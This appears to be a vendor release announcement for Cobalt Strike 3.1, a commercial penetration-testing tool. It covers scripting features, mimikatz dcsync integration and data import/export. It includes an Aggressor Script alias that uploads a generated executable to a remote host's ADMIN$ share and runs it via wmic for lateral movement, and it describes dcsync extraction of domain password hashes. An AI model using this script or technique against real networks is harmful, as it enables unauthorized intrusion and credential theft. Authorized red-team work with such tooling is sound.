Cobalt Strike 3.1 is now available. This release adds a lot of polish to the 3.x codebase and addresses several items from user feedback.

Aggressor Script

Aggressor Script is the scripting engine in Cobalt Strike 3.0 and later. It allows you to extend the Cobalt Strike client with new features and automate your engagements with scripts that respond to events.

Scripting was a big focus in the Cobalt Strike 3.1 development cycle. You now have functions that map to most of Beacon’s commands. Scripts can also define new Beacon commands with the alias keyword too.

1alias wmi-alt {
2local('$mydata $myexe');
4# check if our listener exists
5if (listener_info($3) is $null) {
6berror("Listener $3 does not exist");
10# generate our executable artifact
11$mydata = artifact($3, "exe", true);
13# generate a random executable name
14$myexe  = int(rand() * 10000) . ".exe";
16# state what we're doing.
17btask($1, "Tasked Beacon to jump to $2 (" . listener_describe($3, $2) . ") via WMI");
19# upload our executable to the target
20bupload_raw($1, "\\\\ $+ $2 $+ \\ADMIN$\\ $+ $myexe", $mydata);
22# use wmic to run myexe on the target
23bshell($1, "wmic /node: $+ $2 process call create \"c:\\windows\\ $+ $myexe $+ \"");
25# complete staging process (for bind_pipe listeners)
26bstage($1, $2, $3);

This release also introduces the agscript command in Cobalt Strike’s Linux package. This command runs a headless Cobalt Strike client designed to host your scripts.

While I can’t say the scripting work is complete yet (it’s not); this release is a major step forward for Aggressor Script. You can learn more about Aggressor Script by reading its documentation.


In August 2015, mimikatz introduced a dcsync command, authored by Benjamin Delpy and Vincent LE TOUX. This command uses Windows features for domain replication to pull the password hash for the user you specify. DcSync requires a trust relationship with the DC (e.g., a domain admin token). Think of this as a nice safe way to extract a krbtgt hash.

Cobalt Strike 3.1 integrates a mimikatz build with the dcsync functionality. Beacon also gained a dcsync command that populates the credential model with the recovered hash.

Data Munging

Cobalt Strike 3.1 introduces the ability to import hosts and services from an NMap XML file. Cobalt Strike 3.1 also gives you the ability to export credentials in a PWDump file.

Check out the release notes to see a full list of what’s new in Cobalt Strike 3.1. Licensed users may use the update program to get the latest.